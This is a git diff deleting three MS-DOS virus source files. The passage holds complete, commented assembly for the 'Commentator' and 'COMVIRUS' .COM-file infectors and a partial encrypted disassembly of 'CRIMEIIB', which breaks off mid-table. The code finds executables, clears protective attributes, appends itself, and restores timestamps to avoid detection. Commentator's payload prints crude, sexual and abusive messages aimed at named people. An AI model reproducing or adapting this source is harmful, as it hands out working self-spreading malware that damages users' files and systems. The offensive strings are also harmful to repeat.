@@ -1,334 +0,0 @@ -;Ŀ -; Commentator Virus by Glenn... -;Ĵ -; This will be a Parasytic Non-Resident .COM infector. -; It will also infect COMMAND.COM. -; -.MODEL TINY - -Public VirLen,MovLen - -Code Segment para 'Code' -Assume Cs:Code,Ds:Code,Es:Code - - Org 100h - -Signature Equ 0DeDeh ; Signature of virus! - -Buff1 Equ 0F100h -Buff2 Equ Buff1+2 -VirLen Equ Offset Einde-Offset Begin -MovLen Equ Offset Einde-Offset Mover -DTA Equ 0F000h -Proggie Equ DTA+1Eh -Lenny Equ DTA+1Ah - -MinLen Equ Virlen ;Minimale lengte te besmetten programma -MaxLen Equ 0EF00h ; Maximale lengte te besmetten programma - -; -; This part will contain the actual virus code, for searching the -; next victim and infection of it. -; - -Begin: - Jmp Short OverSig ; Sprong naar Oversig vanwege kenmerk - DW Signature ; Herkenningsteken virus -Oversig: - Pushf ;------------------ - Push AX ; Alle registers opslaan voor - Push BX ; later gebruik van het programma - Push CX ; - Push DX ; - Push DS ; - Push ES ; - Push SS ; - Push SI ; - Push DI ;------------------ -InfectPart: - Mov AX,Sprong ;------------------ - Mov Buf1,AX ; Spronggegevens bewaren om - Mov BX,Source ; besmette programma te starten - Mov Buf2,BX ;------------------ - Mov AH,1Ah ; DTA area instellen op - Mov DX,DTA ; $DTA area - Int 21h ;------------------ -Vindeerst: Mov AH,4Eh ; Zoeken naar 1e .COM file in directory - Mov Cx,1 ; - Lea DX,FindPath ; - Int 21h ;------------------ - Jnc KijkInfected ; Geen gevonden, goto Afgelopen - Jmp Afgelopen ;------------------ -KijkInfected: - Mov DX,Cs:[Lenny] ;------------------ - Cmp DX,MinLen ; Kijken of programmalengte voldoet - Jb ZoekNext ; aan de eisen van het virus - Cmp DX,MaxLen ; - Ja ZoekNext ;------------------ -On2: Mov AH,3Dh ; Zo ja , file openen en file handle - Mov AL,2 ; opslaan - Mov DX,Proggie ; - Int 21h ; - Mov FH,AX ;------------------ - Mov BX,AX ; - Mov AH,3Fh ; Lezen 1e 4 bytes van een file met - Mov CX,4 ; een mogelijk kenmerk van het virus - Mov DX,Buff1 ; - Int 
21h ;------------------ -Sluiten: Mov AH,3Eh ; File weer sluiten - Int 21h ;------------------ - Mov AX,CS:[Buff2] ; Vergelijken inhoud lokatie Buff1+2 - Cmp AX,Signature ; met Signature. Niet gelijk : Zoeken op - Jnz Infect ; morgoth virus. Als bestand al besmet -ZoekNext: - Mov AH,4Fh ;------------------ - Int 21h ; Zoeken naar volgende .COM file - Jnc KijkInfected ; Geen gevonden, goto Afgelopen - Jmp Afgelopen ;------------------ -Infect: - Mov DX,Proggie ; beveiliging weghalen - Mov AH,43h ; - Mov AL,1 ; - Xor CX,Cx - Int 21h ;------------------ - Mov AH,3Dh ; Bestand openen - Mov AL,2 ; - Mov DX,Proggie ; - Int 21h ;------------------ - Mov FH,AX ; Opslaan op stack van - Mov BX,AX ; datum voor later gebruik - Mov AH,57H ; - Mov AL,0 ; - Int 21h ; - Push CX ; - Push DX ;------------------ - Mov AH,3Fh ; Inlezen van eerste deel van het - Mov CX,VirLen+2 ; programma om later terug te - Mov DX,Buff1 ; kunnen plaatsen. - Int 21h ;------------------ - Mov AH,42H ; File Pointer weer naar het - Mov AL,2 ; einde van het programma - Xor CX,CX ; zetten - Xor DX,DX ; - Int 21h ;------------------ - Xor DX,DX ; Bepalen van de variabele sprongen - Add AX,100h ; in het virus (move-routine) - Mov Sprong,AX ; - Add AX,MovLen ; - Mov Source,AX ;------------------ - Mov AH,40H ; Move routine bewaren aan - Mov DX,Offset Mover ; einde van file - Mov CX,MovLen ; - Int 21h ;------------------ - Mov AH,40H ; Eerste deel programma aan- - Mov DX,Buff1 ; voegen na Move routine - Mov CX,VirLen ; - Int 21h ;------------------ - Mov AH,42h ; File Pointer weer naar - Mov AL,0 ; het begin van file - Xor CX,CX ; sturen - Xor DX,DX ; - Int 21h ;------------------ - Mov AH,40h ; En programma overschrijven - Mov DX,Offset Begin ; met code van het virus - Mov CX,VirLen ; - Int 21h ;------------------ - Mov AH,57h ; Datum van aangesproken file - Mov AL,1 ; weer herstellen - Pop DX ; - Pop CX ; - Int 21h ;------------------ - Mov AH,3Eh ; Sluiten file - Int 21h ;------------------ -Afgelopen: Mov 
BX,Buf2 ; Sprongvariabelen weer - Mov Source,BX ; op normaal zetten voor - Mov AX,Buf1 ; de Move routine - Mov Sprong,AX ;------------------ - Mov AH,1Ah ; DTA adres weer op normaal - Mov Dx,80h ; zetten en naar de Move - Int 21h ; routine springen - Mov Ah,2Ch - Int 21h - Xor DL,DL - Xchg Dh,Dl - Add Dx,Dx -; And Dx,11111110b - Add Dx,Offset MsgTab - Mov Si,Dx - Mov Dx,Cs:[SI] - Mov AH,9 - Int 21h - Jmp CS:[Sprong] ;------------------ - -Msgtab DW offset Msg1 - DW offset Msg2 - DW offset Msg3 - DW offset Msg4 - DW offset Msg5 - DW offset Msg6 - DW offset Msg7 - DW offset Msg8 - DW offset Msg9 - DW offset Msg10 - DW offset Msg11 - DW offset Msg12 - DW offset Msg13 - DW offset Msg14 - DW offset Msg15 - DW offset Msg16 - DW offset Msg17 - DW offset Msg18 - DW offset Msg19 - DW offset Msg20 - DW offset Msg21 - DW offset Msg22 - DW offset Msg23 - DW offset Msg24 - DW offset Msg25 - DW offset Msg26 - DW offset Msg27 - DW offset Msg28 - DW offset Msg29 - DW offset Msg30 - DW offset Msg31 - DW offset Msg32 - DW offset Msg33 - DW offset Msg34 - DW offset Msg35 - DW offset Msg36 - DW offset Msg37 - DW offset Msg38 - DW offset Msg39 - DW offset Msg40 - DW offset Msg41 - DW offset Msg42 - DW offset Msg43 - DW offset Msg44 - DW offset Msg45 - DW offset Msg46 - DW offset Msg47 - DW offset Msg48 - DW offset Msg49 - DW offset Msg50 - DW offset Msg51 - DW offset Msg52 - DW offset Msg53 - DW offset Msg54 - DW offset Msg55 - DW offset Msg56 - DW offset Msg57 - DW offset Msg58 - DW offset Msg59 - DW offset Msg60 - -Msg1 Db 13,10,'Cycle sluts from hell',13,10,'$' -Msg2 Db 13,10,'Virus Mania IV',13,10,'$' -Msg3 Db 13,10,'2 Live Crew is fucking cool',13,10,'$' -Msg4 Db 13,10,'Like Commentator I, HIP-HOP sucks',13,10,'$' -Msg5 Db 13,10,'Dr. 
Ruth is a first-class lady!',13,10,'$' -Msg6 Db 13,10,'Dont be a wimp, be dead!',13,10,'$' -Msg7 Db 13,10,'This dick was made for laying girls.',13,10,'$' -Msg8 Db 13,10,'No virus entry, just me!',13,10,'$' -Msg9 Db 13,10,'Dont bite it, you horny bitch!',13,10,'$' -Msg10 Db 13,10,'Stroke my keys, oh YES!',13,10,'$' -Msg11 Db 13,10,'Sex Revolution 4000',13,10,'$' -Msg12 Db 13,10,'Buck Rogers is fake',13,10,'$' -Msg13 Db 13,10,'(C) by Glenn Benton',13,10,'$' -Msg14 Db 13,10,'Registration number required',13,10,'$' -Msg15 Db 13,10,'The fly is alive',13,10,'$' -Msg16 Db 13,10,'Dont fuck with me, or I will kick some ass...',13,10,'$' -Msg17 Db 13,10,'Hey, dont hit the keys that hard!',13,10,'$' -Msg18 Db 13,10,'You will feel me...',13,10,'$' -Msg19 Db 13,10,'BEER BEER BEER BEER BEER BEER BEER!!!',13,10,'$' -Msg20 Db 13,10,'YOU HAVE A VIRUS, BWAH AH AH EH EH HEH ARF!',13,10,'$' -Msg21 Db 13,10,'I would alter Michael Jacksons face with my fists...',13,10,'$' -Msg22 Db 13,10,'WIM KOK IS STILL A COMMUNIST!',13,10,'$' -Msg23 Db 13,10,'Welcome to COMMENTATOR II',13,10,'$' -Msg24 Db 13,10,'Commentator I & II released!',13,10,'$' -Msg25 Db 13,10,'Legalize ABORTUS!',13,10,'$' -Msg26 Db 13,10,'Ronald McDonald goes Oude-Pekela!',13,10,'$' -Msg27 Db 13,10,'Source code soon aveable...',13,10,'$' -Msg28 Db 13,10,'Dont use a rubber against this virus!',13,10,'$' -Msg29 Db 13,10,'Swimming holiday in Bangladesh!',13,10,'$' -Msg30 Db 13,10,'Neo Nazis are a pile of shit.',13,10,'$' - -Msg31 Db 13,10,'Virus researchers are a pile of meat on the street.',13,10,'$' -Msg32 Db 13,10,'World Championship Cat-Throwing',13,10,'$' -Msg33 Db 13,10,'Yo Yo Yo Yo Yo Yo Yo, James Brown is DEAD!',13,10,'$' -Msg34 Db 13,10,'Yech, you are reminding me of my mother-in-law...',13,10,'$' -Msg35 Db 13,10,'How is the weather out there?',13,10,'$' -Msg36 Db 13,10,'Indalis is a fat bitch who looks like a glass-bin.',13,10,'$' -Msg37 Db 13,10,'Lubbers should be castrated for a long time ago.',13,10,'$' -Msg38 Db 
13,10,'Legalize hookers (at a low prize!)',13,10,'$' -Msg39 Db 13,10,'Fist fucking sounds irrelevant to you, eh?',13,10,'$' -Msg40 Db 13,10,'I will be Back...',13,10,'$' -Msg41 Db 13,10,'Today it is..... JUDGEMENT DAY!!!',13,10,'$' -Msg42 Db 13,10,'Never mind the dog, beware of owner.',13,10,'$' -Msg43 Db 13,10,'You still owe me a CO-PROCESSOR!',13,10,'$' -Msg44 Db 13,10,'Do not drink and drive',13,10,'$' -Msg45 Db 13,10,'Last name ALMIGHTY, first name DICK',13,10,'$' -Msg46 Db 13,10,'Frodo lives!',13,10,'$' -Msg47 Db 13,10,'The leech lives',13,10,'$' -Msg48 Db 13,10,'Hey, Cracker Jack! Nice virus you made!',13,10,'$' -Msg49 Db 13,10,'A depressive Prince Claus looks like fun!',13,10,'$' -Msg50 Db 13,10,'Happy Eastern',13,10,'$' -Msg51 Db 13,10,'Thank god for AIDS',13,10,'$' -Msg52 Db 13,10,'Art is incredible stupid',13,10,'$' -Msg53 Db 13,10,'Out of semen error',13,10,'$' -Msg54 Db 13,10,'Incorrect BEF version',13,10,'$' -Msg55 Db 13,10,'Of je stopt de stekker erin?!?',13,10,'$' -Msg56 Db 13,10,'Jean Claude van Damme kicks ass.',13,10,'$' -Msg57 Db 13,10,'Cannabis expands the mind',13,10,'$' -Msg58 Db 13,10,'What is this memory? EMS XMS LIM HMA UMB?',13,10,'$' -Msg59 Db 13,10,'NOOOOOO NOT AN IBM SYSTEM, PLEASE!!!!!',13,10,'$' -Msg60 Db 13,10,'Dutch Virus Research Laboratory',13,10,'$' - -; -; All variables are stored in here, like filehandle, date/time, -; search path and various buffers. -; - -FH DW 0 -FindPath DB '*.COM',0 - -Buf1 DW 0 -Buf2 DW 0 - -Sprong DW 0 -Source DW 0 - -; -; This will contain the relocator routine, located at the end of -; the ORIGINAL file. This will tranfer the 1st part of the program -; to it's original place. 
-; -Mover: - Mov DI,Offset Begin ;------------------ - Mov SI,Source ; Verplaatsen van het 1e deel - Mov CX,VirLen-1 ; van het programma, wat achter - Rep Movsb ;------------------ - Pop DI ; Opgeslagen registers weer - Pop SI ; terugzetten op originele - Pop SS ; waarde en springen naar - Pop ES ; het begin van het programma - Pop DS ; (waar nu het virus niet meer - Pop DX ; staat) - Pop CX ; - Pop BX ; - Pop AX ; - Popf ; - Mov BX,100h ; - Jmp BX ;------------------ - -; -; Only the end of the virus is stored in here. -; -Einde db 0 - -Code Ends -End Begin - -; -; > and Remember Don't Forget to Call < -; > ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? < -; diff --git a/c/COMVIRUS (49).ASM b/c/COMVIRUS (49).ASM deleted file mode 100755 index e50cc16..0000000 --- a/c/COMVIRUS (49).ASM +++ /dev/null 
@@ -1,458 +0,0 @@ -title COMVIRUS -subttl By Drew Eckhardt -subttl Latest revision: 4-28-1991 - -;The author of this virus intends it to be used for educational -;purposes only, and assumes no responsibilities for its release, -;dammages resulting from its use, including but not limited to -;equipment dammage or data loss. - -;By assembling or examining this program, The user agrees to accept all -;responsibility for this programs use, or any portions of the code -;or concepts contained within. The user also agrees to not publicly release -;this virus, and to exercise necessary precautions to prevent its escape. -;The user accepts all responsibility arising from his actions. - -;Don't come crying to me if your hard disk gets infected, -;as THERE IS NO ANTIDOTE. HAHAHAH. - - -;Revision history: -;4-13: initial bug-free release, size=424 bytes with carrier - -;4-15: added no date change support, size=438 bytes with carrier - -;4-16: minor documentation changes, size=438 bytes with carrier, -; NO CODE CHANGE from 4-15 revision - -;4-21: fixed missing hex h suffixs, made MASM friendly, -; fixed incorrect assume statement (assume statements are ignored -; by A86) enabled hard/floppy infection based on floppy_only status -; size=438 bytes IF floppy_only, 424 bytes if not, with carrier. -; minimum virus length = 419 bytes - -;4-23: added control over how many programs are infected per run, -; switched method of infection, from copying to DTA then writing -; to disk to straight write to disk from memory. -; size=412 bytes IF floppy_only, 398 bytes if not, with carrier. -; minimum virus length = 393 bytes - -;4-28: used set DTA instead of default DTA/copy command line -; buffer, which had been used based on incorrect assumption -; eliminated calls to get time/date, get attribs -; by using information from find first/find next functions 4eh/4fh -; made warning optional for reduced space if desired. Also -; changed mov reg16, bp add reg16, constant to shorter LEA instruction. 
-; size=354 bytes IF floppy_only, warning on W/carrier -; 340 bytes IF w/warning & carrier program -; 286 bytes w/o warning, in program -; minimum virus length = 281 bytes for virus itself - -;4-28pm: instead of near CALL-pop sequences everywhere, switched to -; a single CALL near ptr Reference_Point, putting the result into -; si now that (until the end) string mode addressing is not used. -; Changed places where a register (used as an index) -; was being loaded THEN added to a single LEA isntruction -; size = 340 bytes if floppy_only, warning on w/carrier -; size = 326 bytes if w/warning & carrier -; size = 272 w/o warning -; minimum virus length = 267 bytes for the virus itself - -;4-28pm2: Eliminated unecessary flush buffers call. -; size = 336 bytes if floppy_only w/carrier -; size = 322 bytes w/warning & carrier -; size = 268 w/o warning -; minimum virus length = 263 bytes for virus itself - -;4-30: restored 5 bytes of original code at CS:0100 -; before infecting other programs, allowing the -; original code field to be modified so one disk write could be -; used instead of two -; minor documentation revisions - corrected incorrect -; opcodes in documentation -; size = 326 bytes if floppy_only w/carrier -; size = 312 bytes w/warning & carrier program -; size = 258 bytes w/carrier program -; Minimum virus length = 253 bytes for the virus itself - -;NOTE: The program is currently "set up" for A86 assembly with all -;conditional assembly symbols. #IF and #ENDIF should be replaced with -;MASM IFDEF and ENDIF directives for propper operation. -;Also, instead of using EQUates to define control symbols, the /D -;option or DEFINE could be used..... - - -;COMVIRUS.ASM must be assembled into a .COM file inorder to function -;properly. For convieniece, I recommend an assembler like A86 that will -;assemble to a .COM file without having to go through LINK and EXE2BIN - -;As is, it will infect .COM files located on the current disk. 
-;ONLY if it is a floppy disk, ONLY in the root directory. - -;This is a .COM infector virus, which, does nothing other than print a -;warning message, and spread to all files on the default disk IFF it is -;a floppy disk, in the root directory. - -;Theory: -;This is a non - overwriting virus. I took special precautions to preserve -;all functionality of the original program, including command line, parsed FCB, -;and segment register preservation. This makes the virus harder to detect. - -;The .COM file is a memory image - with no relocation table. Thus, it -;is an easy target for a virus such as this. - -;Infected file format -;jmp near ptr xxxx -;cli cli ;ID bytes -;ORIGINAL program code, sans 5 bytes -;5 bytes ORIGINAL program code -;VIRUS - -;This format makes infection VERY simple. We merely check for our signature -;(in this case cli cli (fa fa) - instructions that no programmer in his -;right mind would use - loading the original five bytes in the process. -;These original bytes are written to the end of the program, then -;A jump to where the virus is. - -;While infection is easy, this method presents some coding problems, as the -;virus does not know where in memory it is. Therefor, When we want to access -;data, we FIND OUT where we are, by performing a near call which PUSHES ip to the -;stack which is then popped. Addresses are then calculated relative to this -;via LEA - -;To run the program as normal, command line is restored, registers restored, -;And original code copied onto the first five bytes of the program. 
- - -;Program control symbols defined here -floppy_only equ 1 -infect_per_run equ 1 ;number of programs infected per run -warn_user equ 1 - -_TEXT segment byte 'CODE' - assume cs:_TEXT,ds:_TEXT,es:_TEXT,ss:_TEXT - org 100h - -Start: jmp infect; - -;This is our signature - cli - cli - -;Original code is the data field where we store the original program code -;which will replace our signature and jmp to infect - -Original_Code: int 20h ;five bytes that simply terminate - nop ;the program - nop - nop - - - -;Data for the virus. In a destructive virus, you would want to encrypt -;any strings using a simple one's complement (not) operation so as to -;thwart detection via text search utilities. Since we want detection to -;be easy, this un-encrypted form is fine. - - -Start_Virus: -#IF warn_user - Warning db "This file infected with COMVIRUS 1.0",10,13,'$' -#ENDIF - -;VirusMask is simply an ASCIIZ terminated string of the files we wish to -;infect. - - VirusMask db '*.COM', 0 -Infect: - push ax ;on entry to a .COM program, STACK: - ;MS-DOS puts drive identifiers ax (drive id for FCB's) <-- sp - ;for the two FCB's in here. Save - ;'em - - ;I use special trickery to find location of data. Since - ;NEAR calls/jmps are RELATIVE, call near ptr find_warn is - ;translated to e8 0000 - which will simply place the location - ;of Reference onto the stack. Our data can be found relative to - ;this point. 
- - call near ptr Reference ;All data is reference realative to - ;Reference - - -Reference: pop bx ;which is placed into bx for LEA - ;instructions - ;bx now contains the REAL address of - ;Reference - ;si points to real address of original - ;code field - lea si, [bx-(offset Reference - offset Original_Code)] - mov di, 0100h ;original code is at 100h - mov cx, 5 ;5 bytes - cld ;from start of buffer - rep movsb ;do it - - mov si, bx ;since BX is used in handle - ;based DOS calls, for the remainder - ;of the virus, si will contain the - ;actual address of reference - -#IF warn_user - - ;Always calculate the address of data relative to known Reference - ;Point - lea dx, [si-(offset Reference - offset Warning)] - mov ah,9h ;DO dos call, DS:DX pointing - int 21h ;to $ terminated string - - ;We want to make sure that the user gets the message - -WaitForKey: - mov ah, 0bh ;we will wait for a keypress - int 21h ;signifying the user has - or al, al ;seen the message. - jz WaitForKey - -#ENDIF - -#IF FLOPPY_ONLY - - ;Since this is a simple demonstration virus, we will only infect - ;.COM files on the default drive IFF it is a floppy disk.... - ;So, we will get information about the disk drive. - - - push ds ;ds:bx returns a byte to - ;media descriptor - - mov ah, 1bh ;get disk information STACK - int 21h ;DOIT ax (drive ID's) - cmp byte ptr ds:[bx], 0f8h ;see if its a hard disk ds <--sp - - pop ds ;restore ds STACK - jne Floppy ;if it was hard.... ax <--sp - jmp near ptr done ;we're nice guys and are done - -Floppy: ;Since it was floppy, we can go on with the infection! -#ENDIF - ;The default DTA, as is will give us problems. The designers of - ;MickeySoft DOS decided to put default DTA at ofset 128 in - ;the PSP. PROBLEM: This is also where the user's precious command - ;line is, and we MUST remain undectected. SO.... we allocate a - ;DTA buffer on the stack. 43 bytes are needed, 44 will do. 
- - sub sp, 44 ;allocate space for findfirst/findnext DTA - mov bp, sp ;set up bp as a reference to this area - - ;Set the DTA - mov dx, bp ;point DS:DX to our area - mov ah, 1ah ;set DTA - int 21h - - ;Set up pointers to data in DTA - dta equ word ptr [bp] - file_name equ word ptr [bp+1eh] - attributes equ byte ptr [bp+15h] - time_stamp equ word ptr [bp+16h] - date_stamp equ word ptr [bp+18h] - file_size equ dword ptr [bp+1ah] - - ;We dynamically allocate a variable to store the number of programs STACK - ;The virus has infected. FCB drives - ; bp--> 44 byte DTA - infected_count equ byte ptr[bp-2]; Infected_Count - xor ax, ax ;zero variable, sp--> buffer (6 bytes) - push ax ;allocate it on the stack - sub sp, 6 ;allocate small buffer - - ;Now, we begin looking for files to infect. - lea dx, [si - (offset Reference - offset VirusMask)] - ;DS:DX points to the search string STACK - mov ah, 4eh ;find first matching directory entry FCB drives (word) - mov cx, 111b ;only default directory, FILES - ;hidden, system and normal - int 21h ;doit bp--> 44 byte DTA buffer - ; infected count (word) - jnc Research ;carry is clear when a file was sp--> 6 byte buffer - jmp nofile ;found. - - -ReSearch: -;All handle based DOS calls take a pointer to an ASCIIZ file name in ds:dx - lea dx, file_name - -;Since this is a virus, we want to infect files that can't be touched by -;DOS commands, this means readonly, system, and hidden files are at our -;mercy. To do this, we rely on the findfrst/next attributes and other data -;to restore the attribute byte to the original settings. 
get/SET can fix -;them to be suitable - mov cl, attributes - and cl, 11100000b ;not readonly, system, or hidden STACK - ; FCB drives - mov ax, 4301h ;set attributes bp--> buffer (44 bytes) - int 21h ; buffer (6 bytes) - ; sp--> infected_count - jnc NoError ;check for error - jmp Restore_Flags -NoError: - mov ax, 3d02h ;now, open file using handle, - ;read/write access - int 21h ; - jnc NoError2 ;IF there was an error, we are done - jmp Restore_Flags ;But we don't need to commit or close - -NoError2: - mov bx, ax ;The handle was returned in ACC. - ;Howwever, all handle based DOS - ;calls expect it in BX - - -;We don't want to infect the program more than once, so we will -;check to see if it is infected. - - - mov ax, 4200h ;seek relative to start of file - ; bx contains handle from open operation - xor cx,cx ;cx:dx is file pointer - xor dx, dx ; - int 21h ;DOIT - -;Now, we will read in enough data to see if we have our virus signature. - mov ah, 3fh ;read data - lea dx, [si-(offset reference-offset original_code)] - ;into original_code buffer - mov cx, 5 ;5h bytes - ; bx contains handle from last operation - int 21h - - cmp word ptr [si-(offset reference-offset original_code)+3], 0fafah - jne GoApe ;if we aren't already infected, - jmp Error ;go for it - -GoApe: -;Since it is safe to infect, we will - mov ax, 4202h ;seek end of file - xor cx, cx - xor dx, dx - int 21h - - or dx, dx ;check for valid .COM format - jz Less_Than_64K - jmp Error - -Less_Than_64K: - -;Now, we must calculate WHERE the jump will be to. 
Let's examine the program -;Structure: -;jmp near ptr xxxx -;Cli Cli }These add up to the original length -;Orignal code sans 5 bytes - -;Original_Code (5 bytes) }The length of all virus data -;Other virus data is equal to the difference in -;Infect the addresses of Infect and Original_Code - -;End_Virus - - -;Thus, the jump must jump TO (offset Infect- offset Original_Code + Original_Length + origin) -;However, in the 80x86, NEAR jumps are calculated as an offset from the position -;of the next statement to execute (because of fetch/execute cycle operation). - -;Since jmp near ptr xxxx takes 3 bytes, the next instruction is THREE bytes from -;The 0E9h jmp near instruction, so xxxx will be (offset Infect-Offset Original_Code -;+Original_Length-3); - - ;Since AX already contains the original length, we will merely add - ;Space for the virus data, and take care of the three bytes - ;of code generated by the jmp near instruction. - - add ax, (offset Infect - Offset Original_Code -3) - - ;calculate jump address - mov byte ptr [bp-8], 0e9h ;jmp near instruction - mov word ptr [bp-7], ax ;offset for near jmp - mov word ptr [bp-5], 0fafah ;cli cli - - mov ax, 4200h ;seek begining of file - xor cx, cx - mov dx, cx - int 21h - - mov ah, 40h ;write patched code - mov cx, 5 ;5 bytes of code - lea dx, [bp-8] ;our buffer - int 21h - - mov ax, 4202h ;seek EOF - xor cx, cx - xor dx, dx - int 21h - - - lea dx, [si - (offset Reference - offset Original_Code)]; set start - mov cx, (offset End_Virus - offset Original_Code) ;set length - mov ah, 40h ;append virus to file - int 21h ;doit - - inc infected_Count ;bump up the number of programs infected - -Error: mov dx,date_stamp ;restore date - mov cx,time_stamp ;restore time - mov ax, 5701h ;set them - int 21h - - mov ah, 3eh ;close file - int 21h - -Restore_Flags: - xor ch, ch ;zero hi byte flags - mov cl,attributes ;restore flags - lea dx, file_name ;ds:dx points to ASCIIZ string - ;in the buffer, offset 1eh contains - ;the file name 
- mov ax, 4301h ;get/SET flags - int 21h ;Doit - -DoAgain:;See if we're done infecting - cmp infected_count, infect_per_run - jae NoFile ;if we're done, same as no new file - - - mov ah, 4fh ;find next - int 21h - - jc NoFile ;if carry is clear, DOIT again! - jmp ReSearch - -;Since we have no more files, we will restore things to normal. -NoFile: - mov dx, 80h ;reset default dta at DS:80h - mov ah, 1ah ;set DTA - int 21h - - add sp, 52 ;deallocate buffers and infected_count - - - -;Put original code of program BEFORE it was infected back in place! - - -Done: - pop ax ;restore ax - - - ;FUNKY code! In the 80x86, all NEAR or SHORT jmp opcodes take - ;a RELATIVE address...... BUT a retn opcode pops a near absolute - ;address of the stack - saves us the trouble of some calculating - ;relative to here, and the trouble of a self-modifying - ;far absolute jmp! (5 bytes) - - mov bx, 0100h - push bx - ret ;easiest jump to cs:100 - -End_Virus: -_TEXT ends -end start - diff --git a/c/CRIMEIIB (50).ASM b/c/CRIMEIIB (50).ASM deleted file mode 100755 index de838fb..0000000 --- a/c/CRIMEIIB (50).ASM +++ /dev/null 
@@ -1,394 +0,0 @@ - -PAGE 59,132 - -; -; -; CRIMEIIB -; -; Created: 31-Jan-91 -; Passes: 5 Analysis Options on: none -; -; - -data_8e equ 20D3h ;* -data_9e equ 28C9h ;* -data_10e equ 3C81h ;* -data_26e equ 8ECDh ;* -data_34e equ 0B7C5h ;* -data_37e equ 0D848h ;* -data_38e equ 0E245h ;* -data_44e equ 0F198h ;* - -seg_a segment byte public - assume cs:seg_a, ds:seg_a - - - org 100h - -crimeIIb proc far - -start: -;* jmp loc_2 ;* - db 0E9h,0FFh,0FFh - db 1 ; Data table (indexed access) - db 00h, 99h, 5Eh, 81h,0EEh, 03h - db 01h, 83h,0FEh, 00h, 74h, 1Ch - db 2Eh, 8Ah, 94h, 03h, 01h, 8Dh -loc_3: - mov ax,cs - push es - lea bx,[si+12Ah] ; Load effective addr - sub cx,bx - -locloop_4: - mov al,cs:[bx] - xor al,dl - ror dl,1 ; Rotate - mov cs:[bx],al - inc bx - loop locloop_4 ; Loop if cx > 0 - - mov bh,4Ch ; 'L' - loop $+32h ; Loop if cx > 0 - - cbw ; Convrt byte to word - iret ; Interrupt return -;* js loc_6 ;*Jump if sign=1 - db 78h, 35h - xchg ax,di - retn 3479h - adc al,70h ; 'p' - scasb ; Scan es:[di] for al - xor ax,4C20h - db 66h, 83h, 99h, 30h, 95h, 99h - db 29h, 90h, 48h,0BBh, 1Dh, 04h - db 60h, 1Dh, 11h, 48h, 8Eh, 35h - db 0B7h, 44h,0E2h, 3Bh, 9Eh, 41h - db 0F2h, 7Bh, 9Eh, 78h, 7Ch,0FEh - db 0B8h,0FFh,0A6h, 2Dh, 17h, 14h - db 0C7h, 35h, 98h,0D3h, 5Bh, 33h - db 99h -loc_6: - mov cx,1D6Ch - pop di - dec ax - db 0C8h, 32h, 99h, 5Ch, 8Dh, 3Bh - db 09h,0E2h,0A0h,0B7h, 37h,0CDh - db 67h,0A3h, 72h, 81h,0F6h - -locloop_7: - jle loc_3 ; Jump if < or = -;* call far ptr sub_7 ;* - db 9Ah, 63h, 33h, 99h,0CCh - db 67h, 33h, 98h, 3Ch, 99h,0C3h - db 66h,0CCh, 66h, 33h, 99h,0CDh - db 66h,0FEh,0B9h,0CCh - db 64h, 37h - db 99h - db 0CCh, 66h - dw 9931h ; Data table (indexed access) - db 33h, 69h,0CCh, 66h,0CCh, 66h - db 0CDh, 66h,0CCh, 66h,0D3h, 98h - db 0CCh, 66h, 2Fh, 99h,0CCh, 66h - db 26h, 98h,0CEh - db 65h, 33h - -locloop_8: - cbw ; Convrt byte to word - xor bp,[bp+si+39h] - cbw ; Convrt byte to word - out 48h,al ; port 48h ??I/O Non-standard - jbe $-3Dh ; Jump if below or = 
- mov [bp+19h],sp - mov bh,8Fh - sub [bp-67h],di - in al,dx ; port 0, DMA-1 bas&add ch 0 - db 66h, 37h, 70h,0CCh, 66h,0B0h - db 67h,0CCh, 13h, 30h, 70h, 1Bh - db 66h, 1Dh, 12h, 48h,0F7h - db 32h,0A4h, 81h, 3Ch -loc_10: - inc si - nop - loop locloop_7 ; Loop if cx > 0 - - mov bh,16h - int 67h ; ??INT Non-standard interrupt - esc 0,[bp+si+485Ch] ; coprocessor escape - cmc ; Complement carry - sbb ax,6743h - xor dx,[si] -;* jo loc_11 ;*Jump if overflow=1 - db 70h,0F7h - xor ah,[bp+si] - int 3 ; Debug breakpoint - db 67h, 8Ah, 97h,0CCh - -locloop_12: - in ax,dx ; port 0, DMA-1 bas&add ch 0 - db 36h, 10h,0CBh, 25h - db 70h,0DEh, 8Bh, 84h,0C5h,0B7h - db 47h,0E2h,0B0h, 98h,0E2h,0EFh - db 0B7h, 1Ch,0CDh - db 48h,0B8h, 1Dh, 4Bh, 67h, 1Dh - db 10h, 48h,0EFh, 32h,0B7h, 47h - db 0E2h, 94h, 98h,0E2h,0EFh,0B7h - db 12h,0CDh,0D2h, 19h, 54h,0EDh - db 48h, 0Ah, 0Dh, 78h, 67h, 4Fh - db 9Ah, 27h, 19h,0A3h,0B7h,0F6h - db 0E2h, 9Dh, 98h,0B9h, 65h,0D8h - db 0ECh, 5Ch,0EBh,0AFh, 16h,0CEh - db 0DFh, 2Ah, 99h,0E2h,0ECh, 24h - db 19h, 3Eh, 33h, 87h, 9Bh, 01h - db 47h, 70h, 7Bh, 3Fh,0EBh,0AFh - db 51h,0CAh,0DEh, 33h, 98h,0FFh - db 0AFh, 1Dh, 10h,0CBh, 25h, 70h - db 67h, 08h, 27h,0B0h, 60h,0ECh - db 18h,0C0h, 14h, 50h,0AEh, 35h - db 2Ch,0CCh,0DCh,0B3h, 99h, 79h - db 66h, 83h, 99h, 7Dh, 60h,0E1h - db 79h, 46h,0AEh,0B3h, 50h,0CDh - db 0DEh, 33h, 9Ch, 01h, 75h, 41h - db 9Eh, 32h,0A0h,0B3h, 67h,0C5h - db 13h,0D6h, 20h,0C9h, 66h, 87h - db 9Bh, 7Eh, 61h,0FEh,0B8h, 2Eh - db 9Eh,0D8h, 67h, 93h, 3Eh, 22h - db 8Dh,0CDh, 72h, 25h, 9Eh,0D0h - db 7Eh, 23h,0ECh,0D0h, 7Ah, 46h - db 0ECh,0CFh, 7Ah, 34h, 99h,0CAh - db 39h, 6Bh,0C6h, 94h,0D2h, 2Ah - db 54h,0EDh, 48h,0BBh, 1Dh, 09h - db 67h, 87h,0DEh,0FFh,0B4h - db 65h - db 14h, 78h,0AFh, 35h, 54h,0EDh - db 38h - db 1Dh, 5Fh, 48h,0D0h, 32h, 99h - db 24h, 3Bh - -locloop_17: - xor dx,[si] - push ax - db 0C9h, 32h,0B7h, 46h,0E2h, 85h - db 98h,0E2h, 98h,0B7h, 2Fh,0CDh - db 0FEh - db 30h - db 41h,0E2h,0ECh, 34h - db 13h, 1Ch, 5Ah,0CCh,0ECh,0CFh - db 8Fh, 1Eh, 9Ah, 
